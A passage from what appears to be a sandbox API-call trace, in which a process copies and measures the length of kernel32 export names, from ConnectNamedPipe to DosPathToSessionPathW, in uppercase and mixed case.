returned="ConnectNamedPipe" [0082.707] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.707] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.707] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.707] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.707] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.707] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.707] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.707] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.707] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.708] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.708] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.708] lstrlenA (lpString="COPYFILEA") returned 9 [0082.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.708] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.708] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.708] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.708] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.708] lstrlenA (lpString="COPYFILEW") returned 9 [0082.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.708] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.708] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.708] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.708] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.708] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.708] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.709] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.709] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.709] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.709] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.709] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.709] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.709] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.709] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.709] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.709] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.709] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.709] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.709] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.709] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.709] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.709] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.709] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.710] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.710] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.710] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.710] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.710] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.710] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.710] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.710] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.710] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.710] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.710] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.710] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.710] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.710] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.710] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.710] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.710] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.710] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.711] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.711] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.711] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.711] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.711] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.711] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.711] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.711] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.711] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.711] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.711] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.711] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.711] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.711] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.711] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.711] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.711] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.711] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.711] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.712] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.712] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.712] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.712] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.712] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.712] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.712] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.712] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.712] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.712] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.712] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.712] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.712] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.712] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.712] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.712] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.712] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.713] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.713] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.713] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.713] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.713] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.713] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.713] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.713] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.713] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.713] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.713] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.713] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.713] lstrlenA (lpString="DELETEATOM") returned 10 [0082.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.713] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.713] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.713] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.713] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.713] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.714] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.714] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.714] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.714] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.714] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.714] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.714] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.714] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.714] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.714] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.714] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.714] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.714] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.714] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.714] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.714] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.714] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" 